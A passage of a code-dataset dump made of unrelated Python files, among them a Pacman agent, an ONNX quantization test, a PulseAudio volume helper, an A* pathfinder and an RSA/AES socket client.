len(self.getCapsules(gameState))\n if ghosts:\n backDist = self.getMazeDistance(myPos, self.base)\n closestGhost = newGhostPositions[0] # tuple\n for ghostPos in newGhostPositions:\n if self.getMazeDistance(ghostPos, myPos) < self.getMazeDistance(closestGhost, myPos):\n closestGhost = ghostPos\n if self.getMazeDistance(closestGhost, myPos) == 0:\n return -100000000\n if newScaredTimes[newGhostPositions.index(closestGhost)] < 6:\n ghostWeight = .2\n ghostScore = self.getMazeDistance(closestGhost, myPos)\n return ghostWeight * ghostScore / (backDist + 1) - 2*backDist - 100*lenCaps\n return self.evaluationFunction(gameState)\n def evaluationFunction(self, gameState):\n myState = gameState.getAgentState(self.index)\n myPos = myState.getPosition()\n myFood = self.getFood(gameState)\n if not myState.isPacman:\n pac = -5\n else:\n pac = 0\n enemies = [gameState.getAgentState(i) for i in self.getOpponents(gameState)]\n ghosts = [a for a in enemies if not a.isPacman and a.getPosition() != None]\n GhostStates = ghosts\n newScaredTimes = [ghostState.scaredTimer for ghostState in GhostStates]\n\n closestFoodDist = min(map(lambda x: self.getMazeDistance(x, myPos), myFood.asList()))\n newGhostPositions = [g.getPosition() for g in ghosts]\n\n closeFoodScore = 1 / float(closestFoodDist) if not myFood[int(myPos[0])][int(myPos[1])] else 20\n lenCaps = len(self.getCapsules(gameState))\n\n if self.getCapsules(gameState):\n closestCapDist = min(map(lambda x: self.getMazeDistance(x, myPos), self.getCapsules(gameState)))\n capScore = 1/float(closestCapDist)\n else:\n closestCapDist = 0\n capScore = 0\n if GhostStates:\n closestGhost = newGhostPositions[0] # tuple\n for ghostPos in newGhostPositions:\n if self.getMazeDistance(ghostPos, myPos) < self.getMazeDistance(closestGhost, myPos):\n closestGhost = ghostPos\n if self.getMazeDistance(closestGhost, myPos) == 0:\n return -100000000\n if self.getMazeDistance(closestGhost, myPos) < 3 and deadEnd(gameState, myPos):\n return -1000\n if newScaredTimes[newGhostPositions.index(closestGhost)] == 0:\n ghostWeight = .2\n if self.followed(gameState):\n ghostWeight = .7\n ghostScore = self.getMazeDistance(closestGhost, myPos)\n return self.getScore(gameState) + ghostWeight * ghostScore / (\n closestFoodDist + 1) - foodCount(self.getFood(gameState)) + 3*closeFoodScore + pac - 100*lenCaps\n return closeFoodScore - 5*foodCount(myFood)\n\ndef deadEnd(gameState, myPos):\n combinations = [[(myPos[0], myPos[1] + 1), (myPos[0] + 1, myPos[1]), (myPos[0], myPos[1] - 1)],\n [(myPos[0], myPos[1] + 1), (myPos[0] - 1, myPos[1]), (myPos[0], myPos[1] - 1)],\n [(myPos[0] - 1, myPos[1]), (myPos[0], myPos[1] + 1), (myPos[0], myPos[1] - 1)],\n [(myPos[0] + 1, myPos[1]), (myPos[0], myPos[1] + 1), (myPos[0], myPos[1] - 1)],\n [(myPos[0], myPos[1] - 1), (myPos[0], myPos[1] + 1), (myPos[0] + 1, myPos[1])]]\n for comb in combinations:\n surr = True\n for pos in comb:\n surr = surr and gameState.hasWall(int(pos[0]), int(pos[1]))\n if surr:\n return True\n return False\n\ndef foodCount(foodGrid):\n res = 0\n for bool in foodGrid.asList():\n if bool:\n res += 1\n return res","sub_path":"raw_submissions/myTeam - Joshua Yurtsever.py","file_name":"myTeam - Joshua Yurtsever.py","file_ext":"py","file_size_in_byte":14822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"132746064","text":"import os\nfrom PIL import Image as PIL_I\n\n\n##I was thinking something like Screen.tile.batch.new(self. parameters..)\n##where there are classes inside classes.\n\nclass Palette(object):\n\n #palbase is the contant grey scale only used for setting palmask on init\n __palbase = [0x000000, 0x0f0f0f, 0x1f1f1f, 0x2f2f2f, 0x3f3f3f, 0x4f4f4f, 0x5f5f5f, 0x6f6f6f,\n 0x7f7f7f, 0x8f8f8f, 0x9f9f9f, 0xafafaf, 0xbfbfbf, 0xcfcfcf, 0xdfdfdf, 0xefefef]\n\n def __init__(self, bytes: int) -> None:\n if bytes != 1 and bytes != 2 and bytes != 3 and bytes != 4:\n raise ValueError(\"Error: class palette, bytes must be either 1, 2, 3, or 4\")\n else:\n\n #palmask is the grey scale refrence palette for the image\n self.__palmask = []\n #palette the colors to replace in image\n self.__palette = []\n #bytes the palette byte length\n self.__bytes = bytes\n #color the current color to append to palmask\n self.__color = self.__palbase[0]\n\n #loop though palbase and set palmask to the correct bytes\n for i in range(len(self.__palbase)):\n if i % (2 ^ self.__bytes) == 0:\n print(i)\n self.__color = self.__palbase[i]\n #self.__palmask.append(self.__color)\n #print(self.__color)\n\n #a test method for debugging won't be in release\n def get_mask(self):\n return self.__palmask\n\n def get_palette_hex(self, c0: int, c1: int, c2: int, c3: int, c4: int, c5: int, c6: int, c7: int):\n pal = []\n my_list = [c0, c1, c2, c3, c4, c5, c6, c7]\n\n for base in my_list:\n mask = 0xff\n\n a = (base >> 16) & mask\n b = (base >> 8) & mask\n c = (base >> 0) & mask\n\n pal.extend((a, b, c))\n\n return pal\n\nclass Tile:\n def __init__(self):\n pass\n\n def get_rect(self, index: int, tile_size: int):\n x1 = int(index % 16) * tile_size\n y1 = int(index / 16) * tile_size\n x2 = int(x1 + tile_size)\n y2 = int(y1 + tile_size)\n rect = (x1, y1, x2, y2)\n return rect\n\n\n\n\n\n '''\n def new(self):\n img = PIL_I.new(\"P\", (128, 128))\n img = img.convert(\"P\", palette=PIL_I.ADAPTIVE, colors=16)\n bank = []\n\n for i in range(128):\n Tile.get_rect(i, 8)\n tile = img.crop(rect)\n bank.insert(0, tile)\n return bank\n\n def load(self, fp: str):\n img = PIL_I.open(fp)\n img = img.convert(\"P\", palette=PIL_I.ADAPTIVE, colors=16)\n bank = []\n\n for i in range(128):\n x1 = int(i % 16) * 8\n y1 = int(i / 16) * 8\n x2 = int(x1 + 8)\n y2 = int(y1 + 8)\n rect = (x1, y1, x2, y2)\n tile = img.crop(rect)\n bank.insert(0, tile)\n bank[i].show()\n return bank\n\n def save(self, fp: str, bank: list):\n img = PIL_I.new(\"P\", (256, 256))\n img = img.convert(\"P\", palette=PIL_I.ADAPTIVE, colors=16)\n bank = bank\n\n for i in range(128):\n x1 = int(i % 16) * 8\n y1 = int(i / 16) * 8\n x2 = int(x1 + 8)\n y2 = int(y1 + 8)\n rect = (x1,y1,x2,y2)\n img.paste(bank[i], rect)\n\n img.convert(\"RGBA\", colors=256)\n return img'''\n\n\n\n\n\n\n\n","sub_path":"Scripts/Classes/Screen.py","file_name":"Screen.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"176323045","text":"##\n## Imprima la suma de la columna 2 por cada letra \n## de la columna 4, ordnados alfabeticamente.\n##\n## a,114\n## b,40\n## c,91\n## d,65\n## e,79\n## f,110\n## g,35\n##\n\n# Carga de base de datos y ajuste de formato \n\ndatos=open('data.csv','r').readlines()\ndatos1 = [z.replace('\\n','') for z in datos]\ndatos2 = [z.replace(',',';') for z in datos1]\ndatos3 = [z.replace('\\t',',') for z in datos2]\ndatos4 = [z.split(',') for z in datos3]\n\n# Creamos listas vacias para almacenar llaves y claves\n\nllave = []\nclaves = []\n\n# Agregamos datos a las listas vacias\n\nfor fila in datos4: \n llave += [(int(fila[1]), valor) for valor in fila[3].split(';')]\n claves += [valor for valor in fila[3].split(';')]\n\n# Creamos lista con valores unicos\n\nvalores_unicos = set(claves)\nvalores_unicos = list(valores_unicos)\nvalores_unicos.sort()\n\n# Imprimimos en formato necesario\n\nfor valor in valores_unicos:\n x=0\n for i,j in llave:\n if valor == j:\n x += i\n print (\"{},{}\".format(valor,x))","sub_path":"q12.py","file_name":"q12.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"561451766","text":"from __future__ import unicode_literals\nfrom base64 import b64decode\nimport datetime\nimport xmltodict\nfrom moto.core import BaseBackend, BaseModel\nfrom moto.core.utils import iso_8601_datetime_with_milliseconds\nfrom moto.core import ACCOUNT_ID\nfrom moto.sts.utils import (\n random_access_key_id,\n random_secret_access_key,\n random_session_token,\n random_assumed_role_id,\n)\n\n\nclass Token(BaseModel):\n def __init__(self, duration, name=None, policy=None):\n now = datetime.datetime.utcnow()\n self.expiration = now + datetime.timedelta(seconds=duration)\n self.name = name\n self.policy = None\n\n @property\n def expiration_ISO8601(self):\n return iso_8601_datetime_with_milliseconds(self.expiration)\n\n\nclass AssumedRole(BaseModel):\n def __init__(self, role_session_name, role_arn, policy, duration, external_id):\n self.session_name = role_session_name\n self.role_arn = role_arn\n self.policy = policy\n now = datetime.datetime.utcnow()\n self.expiration = now + datetime.timedelta(seconds=duration)\n self.external_id = external_id\n self.access_key_id = \"ASIA\" + random_access_key_id()\n self.secret_access_key = random_secret_access_key()\n self.session_token = random_session_token()\n self.assumed_role_id = \"AROA\" + random_assumed_role_id()\n\n @property\n def expiration_ISO8601(self):\n return iso_8601_datetime_with_milliseconds(self.expiration)\n\n @property\n def user_id(self):\n return self.assumed_role_id + \":\" + self.session_name\n\n @property\n def arn(self):\n return \"arn:aws:sts::{account_id}:assumed-role/{role_name}/{session_name}\".format(\n account_id=ACCOUNT_ID,\n role_name=self.role_arn.split(\"/\")[-1],\n session_name=self.session_name,\n )\n\n\nclass SESSBackend(BaseBackend):\n def __init__(self):\n self.assumed_roles = []\n\n def get_session_token(self, duration):\n token = Token(duration=duration)\n return token\n\n def get_federation_token(self, name, duration, policy):\n token = Token(duration=duration, name=name, policy=policy)\n return token\n\n def assume_role(self, **kwargs):\n role = AssumedRole(**kwargs)\n self.assumed_roles.append(role)\n return role\n\n def describe_workspaces(self, **kwargs):\n import json\n fp = open('fixtures/data_mock.json', 'r')\n data = json.load(fp)\n if kwargs:\n raise(\"no don't do that no arguments for now\")\n return data\n\nsess_backend = SESSBackend()\n","sub_path":"moto/session_workspaces/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"42643401","text":"import socket\nimport rsa\nimport pickle\nimport hashlib\nfrom myaes import MYAES\nfrom errorclass import AuthenticationError\n\n\nclass Client:\n\n def __init__(self):\n # 产生非对称密钥\n self.asyKey = rsa.newkeys(2048)\n # 公钥和私钥\n self.publicKey = self.asyKey[0]\n self.privateKey = self.asyKey[1]\n\n\n def link_server(self, addr=('localhost', 8080)):\n # 创建socket通信对象\n # 默认使用AF_INET协议族,即ipv4地址和端口号的组合以及tcp协议\n clientSocket = socket.socket()\n # 默认连接服务器地址为本机ip和8080端口\n clientSocket.connect(addr)\n\n # 向服务器传递公钥,和该公钥字符串化后的sha256值\n print(\"-----正在向服务器传送公钥\")\n sendKey = pickle.dumps(self.publicKey)\n sendKeySha256 = hashlib.sha256(sendKey).hexdigest()\n clientSocket.send(pickle.dumps((sendKey, sendKeySha256)))\n\n # 接受服务器传递的密钥并进行解密\n symKey, symKeySha256 = pickle.loads(clientSocket.recv(1024))\n if hashlib.sha256(symKey).hexdigest() != symKeySha256:\n raise AuthenticationError(\"-----密钥被篡改!\")\n else:\n symKey1 = pickle.loads(rsa.decrypt(symKey, self.privateKey))\n print(\"-----密钥交换完成\")\n\n\n\n # 初始化加密对象\n aes = MYAES()\n while True:\n sendData = input(\"输入你要发送的消息:\")\n if(sendData == 'quit'):\n clientSocket.close()\n break\n en_sendData = aes.myaes_encrypt(sendData, symKey1)\n clientSocket.send(bytes(en_sendData))\n print(\"-----消息发送成功,等待回应...\")\n\n en_recvData = clientSocket.recv(1024)\n plaintext = aes.myaes_decrypt(en_recvData, symKey1)\n print('接收到服务器传来的消息:' + plaintext)\n\n\n\n\n","sub_path":"clientclass.py","file_name":"clientclass.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"62889397","text":"\"\"\"A small library for interacting with the pactl command line tool.\n\nThis library allows for a few simple interactions with linux pulseaudio, like\nviewing active sinks (sound outputs, usually loosely correlating with speakers)\nand their relative volumes, and setting volume absolutely or relatively.\n\nMost functions take a sink argument which defaults to retrieving and using\nthe first 'RUNNING' sink found. This uses a full subprocess, so users doing\nrepeated calls are recommended to get a sink object (eg. through active_sink())\nand pass that to successive calls.\n\nThe pactl tool will need to be installed for this library to work. It is commonly\ninstalled by default when PulseAudio is installed, and on many major distros.\n\"\"\"\n\nimport re\nimport subprocess\n\n\nLIST_PATTERNS = {\n 'state': 'State: (\\w+)',\n 'volume': 'Volume: 0: +(\\d+)%',\n 'name': 'Name: (.+)'\n}\n\n\ndef list_sinks():\n \"\"\"Return a list of sink objects; these are dicts of properties.\"\"\"\n output = subprocess.check_output(['pactl', 'list', 'sinks']).decode()\n sinks = []\n\n for line in output.split('\\n'):\n if line.startswith('Sink #'):\n sink = {}\n sinks.append(sink)\n else:\n # While it's close to YAML output, it isn't, and doesn't parse at all :P\n # So some mad hacks here to pull out some basic data\n for prop, pattern in LIST_PATTERNS.items():\n vals = re.findall(pattern, line)\n if vals:\n sink[prop] = vals[0]\n\n return sinks\n\n\ndef active_sink():\n \"\"\"Retrieve the first running PulseAudio sink.\"\"\"\n for sink in list_sinks():\n if sink['state'] == 'RUNNING':\n return sink\n\n\ndef set_volume(value, sink=None):\n \"\"\"Set an absolute volume for a sink (0-100). Default to active sink.\"\"\"\n sink = sink or active_sink()\n return subprocess.check_call(['pactl', 'set-sink-volume', sink['name'],\n '{}%'.format(value)])\n\n\ndef inc_volume(delta=1, sink=None):\n \"\"\"Set a relative volume for a sink (can be negative). Default to active sink.\"\"\"\n sink = sink or active_sink()\n if sink:\n volume = int(sink['volume'])\n set_volume(max(0, min(100, volume + delta)), sink=sink)\n return sink\n","sub_path":"pactl.py","file_name":"pactl.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"579301962","text":"from PIL import Image\n\nimport os, sys\n\ndirectory = sys.argv[1]\nfilenames = [a for a in os.listdir(directory)]\nprint(len(filenames))\n\n# im = Image.open(\"E:\\\\undemote-arche\\\\wallpaper-cycle-2017-0519\\\\0wS4m - Imgur.jpg\")\n# im = Image.open(\"E:\\\\undemote-arche\\\\wallpaper-cycle-2017-0519\\\\0wS4m - Imgur.jpg\")\n\nindexed = {}\nlengths = []\nfor a in filenames:\n if os.path.isdir(directory+'\\\\'+a):\n continue\n im = Image.open(directory+'\\\\'+a)\n histogram = tuple(im.histogram())\n if histogram not in indexed: indexed[histogram] = []\n indexed[histogram].append(a)\n lengths.append(len(histogram))\nprint(lengths)\nfor a in indexed:\n if len(indexed[a]) > 1:\n print(\"DUPES!\")\n for a in indexed[a]:\n print(\" \"+a)\n# print(len(im.histogram()))","sub_path":"codemuse2018/image-similarity.py","file_name":"image-similarity.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"498574744","text":"from cgi import parse_qs\nfrom datetime import datetime\nimport os\nimport string\nimport urllib\nimport logging\nfrom urlparse import urlparse\n\nimport webapp2\nfrom webapp2_extras import jinja2\n\nfrom google.appengine.api import search\nfrom google.appengine.api import users\n\n_INDEX_NAME = 'greeting'\n\n\n\nclass BaseHandler (webapp2.RequestHandler):\n @webapp2.cached_property\n def jinja2(self):\n return jinja2.get_jinja2(app=self.app)\n\n def render_template(self, filename, template_args):\n self.response.write(self.jinja2.render_template(filename, **template_args))\n\n\n\ndef CreateDocument(author, content):\n \"\"\"Creates a search.Document from content written by the author.\"\"\"\n if author:\n nickname = author.nickname().split('@')[0]\n else:\n nickname = 'anonymous'\n # Let the search service supply the document id.\n return search.Document(\n fields=[search.TextField(name='author', value=nickname),\n search.HtmlField(name='content', value=content),\n search.DateField(name='date', value=datetime.now().date())])\n \n \n \nclass Populate(BaseHandler):\n def get(self):\n template_values = {\n 'url': '/',\n 'url_linktext': 'click here to view search page'\n }\n self.render_template(\"populate.html\", template_values)\n \n def post(self):\n author = None\n if users.get_current_user():\n author = users.get_current_user()\n\n content = self.request.get('content')\n if content:\n search.Index(name=_INDEX_NAME).put(CreateDocument(author, content))\n \n self.redirect('/populate')\n \n \n \nclass Search(BaseHandler):\n def get(self):\n \"\"\"Handles a get request with a query.\"\"\"\n uri = urlparse(self.request.uri)\n query = ''\n qobj = parse_qs(uri.query).get ('query', None)\n if uri.query:\n query = \"*\" if qobj is None else qobj[0]\n # sort results by author descending\n expr_list = [search.SortExpression(\n expression='author', default_value='',\n direction=search.SortExpression.DESCENDING)]\n \n sort_opts = search.SortOptions(\n expressions=expr_list\n )\n \n query_options = search.QueryOptions(\n limit=3,\n sort_options=sort_opts,\n snippeted_fields=['content'],\n returned_fields=['author', 'date']\n )\n \n query_obj = search.Query(query_string=query, options=query_options)\n results = search.Index(name=_INDEX_NAME).search(query=query_obj)\n\n template_values = {\n 'results': results,\n 'number_returned': len(results.results),\n 'url': '/',\n 'url_linktext': 'click here to search again',\n }\n self.render_template('search.html', template_values)\n \n \n \nclass MainPage(BaseHandler):\n def get(self):\n template_values = {\n 'url': '/populate',\n 'url_linktext': 'click here to populate items',\n }\n self.render_template('index.html', template_values)\n \n \n \napplication = webapp2.WSGIApplication([\n (\"/\", MainPage),\n (\"/populate\", Populate),\n (\"/search\", Search)\n], debug=True)\n\n","sub_path":"searchingUnicodeSnippets.py","file_name":"searchingUnicodeSnippets.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"303905506","text":"#!/usr/bin/env python\n# coding: utf-8\n# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\nimport unittest\nimport onnx\nimport onnxruntime\nimport numpy as np\nfrom onnx import helper, TensorProto, numpy_helper\nfrom onnxruntime.quantization import quantize_dynamic\nfrom op_test_utils import TestDataFeeds, check_model_correctness, check_op_type_count, check_op_type_order\n\n\ndef generate_input_initializer(tensor_shape, tensor_dtype, input_name):\n '''\n Helper function to generate initializers for test inputs\n '''\n tensor = np.random.normal(0, 0.3, tensor_shape).astype(tensor_dtype)\n init = numpy_helper.from_array(tensor, input_name)\n return init\n\nclass TestONNXModel(unittest.TestCase):\n def construct_model(self, model_path):\n # input\n # / |\n # / |\n # Conv(1) |\n # | |\n # Relu Conv(2)\n # | |\n # \\ /\n # Add\n # |\n # (output)\n initializers = []\n input = helper.make_tensor_value_info('input', TensorProto.FLOAT, [4, 2, 8, 8])\n output = helper.make_tensor_value_info('output', TensorProto.FLOAT, [4, 2, 8, 8])\n\n initializers.append(generate_input_initializer([2, 2, 1, 1], np.float32, 'W1'))\n initializers.append(generate_input_initializer([2, 2, 1, 1], np.float32, 'W2'))\n initializers.append(generate_input_initializer([2], np.float32, 'B'))\n conv_node_1 = onnx.helper.make_node('Conv', ['input', 'W1', 'B'], ['Conv1_O'], name='Conv1')\n conv_node_2 = onnx.helper.make_node('Conv', ['input', 'W2', 'B'], ['Conv2_O'], name='Conv2')\n relu_node = onnx.helper.make_node('Relu', ['Conv1_O'], ['Relu_O'], name='Relu')\n add_node = onnx.helper.make_node('Add', ['Relu_O', 'Conv2_O'], ['output'], name='Add')\n graph = helper.make_graph([conv_node_1, relu_node, conv_node_2, add_node],\n 'onnx_model_test', [input], [output], initializer=initializers)\n model = helper.make_model(graph, opset_imports=[helper.make_opsetid(\"\", 13)])\n onnx.save(model, model_path)\n\n def dynamic_quant_conv(self, model_fp32_path, model_int8_path):\n quantize_dynamic(model_fp32_path, model_int8_path)\n quant_nodes = {'ConvInteger' : 2}\n check_op_type_count(self, model_int8_path, **quant_nodes)\n check_model_correctness(self, model_fp32_path, model_int8_path, {'input': np.random.rand(4, 2, 8, 8).astype(np.float32)})\n\n def test_quant_conv(self):\n np.random.seed(1)\n model_fp32_path = 'conv_bias.fp32.onnx'\n model_int8_path = 'conv_bias.quant.onnx'\n self.construct_model(model_fp32_path)\n\n self.dynamic_quant_conv(model_fp32_path, model_int8_path)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"onnxruntime/test/python/quantization/test_conv_dynamic.py","file_name":"test_conv_dynamic.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"606926765","text":"from .models import RegistroGpsMovil \nfrom rest_framework import serializers\n\n\nclass RegistroGpsMovilSerializer(serializers.HyperlinkedModelSerializer):\n #coordenadas = serializers.PrimaryKeyRelatedField(many=True, queryset=RegistroGpsMovil.objects.all())\n\n class Meta:\n model = RegistroGpsMovil\n fields = (\n 'latitud', \n 'longitud',\n 'accuray',\n 'altitude',\n 'speed',\n 'speed_accuracy',\n 'marca_phone',\n 'sist_operativo',\n 'version',\n 'imei',\n 'mac_adress',\n 'ip_adress',\n )\n\n\n","sub_path":"servidorAPI/apiFlutter/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"521689209","text":"import bisect, math\nfrom panda3d.core import *\n\nclass InvasionPathfinderAI:\n VERTEX_EXTRUSION = 0.15\n\n def __init__(self, polygons=None):\n self.borders = []\n self.vertices = []\n if polygons:\n for polygon in polygons:\n self.addPolygon(polygon)\n\n self.buildNeighbors()\n\n def addPolygon(self, points):\n newVertices = []\n for i, point in enumerate(points):\n prevPoint = points[(i - 1)]\n x, y = point\n x2, y2 = prevPoint\n self.borders.append((x2, y2, x, y))\n vertex = AStarVertex(Point2(x, y))\n self.vertices.append(vertex)\n newVertices.append(vertex)\n\n for i, vertex in enumerate(newVertices):\n prevVertex = newVertices[(i - 1)]\n nextVertex = newVertices[((i + 1) % len(newVertices))]\n vertex.setPolygonalNeighbors(prevVertex, nextVertex)\n vertex.extrudeVertex(self.VERTEX_EXTRUSION)\n if vertex.interiorAngle > 180:\n self.vertices.remove(vertex)\n\n def buildNeighbors(self):\n for vertex in self.vertices:\n vertex.resetNeighbors()\n\n for i, v1 in enumerate(self.vertices):\n for v2 in self.vertices[i + 1:]:\n self._considerLink(v1, v2)\n\n def planPath(self, fromPoint, toPoint, closeEnough=0):\n x1, y1 = fromPoint\n x2, y2 = toPoint\n if not self._testLineIntersections((x1, y1, x2, y2), self.borders):\n return [\n toPoint]\n fromVertex = AStarVertex(Point2(x1, y1))\n toVertex = AStarVertex(Point2(x2, y2))\n for vertex in self.vertices:\n self._considerLink(vertex, fromVertex)\n self._considerLink(vertex, toVertex)\n\n tempVertices = [fromVertex, toVertex]\n isApproximate = False\n try:\n if not toVertex.getNeighbors():\n if closeEnough is 0:\n return\n isApproximate = True\n closeEnoughSquared = closeEnough * closeEnough\n for border in self.borders:\n projected = self._projectPointToLine(toVertex.pos, border)\n if projected is None:\n continue\n if (projected - toVertex.pos).lengthSquared() > closeEnoughSquared:\n continue\n projectionDirection = projected - toVertex.pos\n projectionDirection.normalize()\n projected += projectionDirection * self.VERTEX_EXTRUSION\n projectedVertex = AStarVertex(projected)\n projectedVertex.link(toVertex)\n self._considerLink(fromVertex, projectedVertex)\n for vertex in self.vertices:\n self._considerLink(vertex, projectedVertex, False)\n\n tempVertices.append(projectedVertex)\n\n astar = AStarSearch()\n result = astar.search(fromVertex, toVertex)\n if result:\n if isApproximate:\n result.pop(-1)\n return [ vertex.pos for vertex in result ]\n return\n finally:\n for tempVertex in tempVertices:\n tempVertex.unlinkAll()\n\n return\n\n def _considerLink(self, v1, v2, testAngles=True):\n if v1.isVertexPolygonalNeighbor(v2):\n v1.link(v2)\n return\n if testAngles:\n if v1.isVertexInsideAngle(v2) or v2.isVertexInsideAngle(v1):\n return\n if v1.isVertexInsideOpposite(v2) or v2.isVertexInsideOpposite(v1):\n return\n x1, y1 = v1.pos\n x2, y2 = v2.pos\n if self._testLineIntersections((x1, y1, x2, y2), self.borders):\n return\n v1.link(v2)\n\n def _makeLineMat(self, x1, y1, x2, y2):\n mat = Mat3(y2 - y1, x1 - x2, 0, x2 - x1, y2 - y1, 0, x1, y1, 1)\n if not mat.invertInPlace():\n return None\n return mat\n\n def _testLineIntersections(self, incident, lines):\n x1, y1, x2, y2 = incident\n mat = self._makeLineMat(x1, y1, x2, y2)\n if not mat:\n return False\n for x1, y1, x2, y2 in lines:\n x1, y1, _ = mat.xform(Point3(x1, y1, 1))\n x2, y2, _ = mat.xform(Point3(x2, y2, 1))\n if not (x1 < 0 and x2 > 0 or x1 > 0 and x2 < 0):\n continue\n m = (y2 - y1) / (x2 - x1)\n b = m * -x1 + y1\n epsilon = 0.001\n if 0.0 + epsilon < b < 1.0 - epsilon:\n return True\n\n return False\n\n def _projectPointToLine(self, point, line):\n x1, y1, x2, y2 = line\n x, y = point\n origin = Point2(x1, y1)\n vecLine = Point2(x2, y2) - origin\n vecPoint = Point2(x, y) - origin\n projectedPoint = vecPoint.project(vecLine)\n if projectedPoint.lengthSquared() > vecLine.lengthSquared():\n return None\n if projectedPoint.dot(vecLine) < 0:\n return None\n return origin + projectedPoint\n\n\nclass AStarVertex:\n\n def __init__(self, pos):\n self.pos = pos\n self.neighbors = []\n self.prevPolyNeighbor = None\n self.nextPolyNeighbor = None\n self.interiorAngle = None\n self.extrudeVector = None\n return\n\n def link(self, neighbor):\n self.__addNeighbor(neighbor)\n neighbor.__addNeighbor(self)\n\n def unlink(self, neighbor):\n self.__removeNeighbor(neighbor)\n neighbor.__removeNeighbor(self)\n\n def unlinkAll(self):\n neighbors = list(self.neighbors)\n for neighbor in neighbors:\n self.unlink(neighbor)\n\n def resetNeighbors(self):\n self.neighbors = []\n\n def __addNeighbor(self, neighbor):\n if neighbor not in self.neighbors:\n self.neighbors.append(neighbor)\n\n def __removeNeighbor(self, neighbor):\n if neighbor in self.neighbors:\n self.neighbors.remove(neighbor)\n\n def setPolygonalNeighbors(self, prev, next):\n vecToPrev = prev.pos - self.pos\n vecToNext = next.pos - self.pos\n angle = vecToPrev.signedAngleDeg(vecToNext)\n angle %= 360\n self.prevPolyNeighbor = prev\n self.nextPolyNeighbor = next\n self.interiorAngle = angle\n prevAngle = Vec2(1, 0).signedAngleDeg(vecToPrev)\n extrudeAngle = prevAngle + self.interiorAngle / 2.0 + 180\n extrudeAngle *= math.pi / 180\n self.extrudeVector = Vec2(math.cos(extrudeAngle), math.sin(extrudeAngle))\n\n def isVertexInsideAngle(self, other):\n if self.prevPolyNeighbor is None or self.interiorAngle is None:\n return False\n vecToPrev = self.prevPolyNeighbor.pos - self.pos\n vecToOther = other.pos - self.pos\n angle = vecToPrev.signedAngleDeg(vecToOther)\n angle %= 360\n return angle < self.interiorAngle\n\n def isVertexInsideOpposite(self, other):\n if self.prevPolyNeighbor is None or self.interiorAngle is None:\n return False\n vecToPrev = self.prevPolyNeighbor.pos - self.pos\n vecToOther = other.pos - self.pos\n angle = vecToPrev.signedAngleDeg(vecToOther)\n angle -= 180\n angle %= 360\n return angle < self.interiorAngle\n\n def extrudeVertex(self, distance):\n if self.extrudeVector is None:\n return\n self.pos += self.extrudeVector * distance\n return\n\n def isVertexPolygonalNeighbor(self, other):\n return other in (self.prevPolyNeighbor, self.nextPolyNeighbor)\n\n def getNeighbors(self):\n return self.neighbors\n\n def getHeuristicTo(self, other):\n return (self.pos - other.pos).length()\n\n def getCostTo(self, other):\n return (self.pos - other.pos).length()\n\n\nclass AStarSearch:\n\n def __init__(self):\n self.openList = []\n self.closed = set()\n self.paths = {}\n self._toVertex = None\n return\n\n def search(self, fromVertex, toVertex):\n self.openList = [\n AStarPath(None, fromVertex, 0, 0)]\n self.closed = set()\n self.paths = {}\n self._toVertex = toVertex\n while self.openList and toVertex not in self.paths:\n self.__doIteration()\n\n path = self.paths.get(toVertex)\n if not path:\n return\n return self.__getVerticesToPath(path)\n\n def __doIteration(self):\n path = self.openList.pop(0)\n vertex = path.vertex\n self.closed.add(vertex)\n neighbors = vertex.getNeighbors()\n for neighbor in neighbors:\n if neighbor in self.closed:\n continue\n cost = vertex.getCostTo(neighbor) + path.totalCost\n if neighbor in self.paths:\n neighborPath = self.paths[neighbor]\n if cost < neighborPath.totalCost:\n self.openList.remove(neighborPath)\n del self.paths[neighbor]\n else:\n continue\n newPath = AStarPath(path, neighbor, cost, neighbor.getHeuristicTo(self._toVertex))\n self.paths[neighbor] = newPath\n bisect.insort(self.openList, newPath)\n\n def __getVerticesToPath(self, path):\n result = []\n while path is not None:\n result.insert(0, path.vertex)\n path = path.parent\n\n return result\n\n\nclass AStarPath:\n\n def __init__(self, parent, vertex, cost, heuristic):\n self.parent = parent\n self.vertex = vertex\n self.heuristic = heuristic\n self.totalCost = cost\n\n def __cmp__(self, other):\n return cmp(self.totalCost + self.heuristic, other.totalCost + other.heuristic)","sub_path":"v2.5.7/toontown/election/InvasionPathfinderAI.py","file_name":"InvasionPathfinderAI.py","file_ext":"py","file_size_in_byte":9756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"102642966","text":"from flask import Flask, request, jsonify\nfrom werkzeug.middleware.proxy_fix import ProxyFix\n\nfrom adzerk.api import Api as AdZerk\nfrom app.client import Client\nfrom app.exceptions.missing_param import MissingParam\nfrom app.exceptions.invalid_content_type import InvalidContentType\nfrom app.exceptions.invalid_param import InvalidParam\nfrom app.validation import is_valid_pocket_id\nfrom provider.geo_provider import GeolocationProvider\n\n\ndef create_app():\n\n app = Flask(__name__)\n # Indicate that we have two proxy servers in front of the App (Docker gateway and load balancer).\n app.wsgi_app = 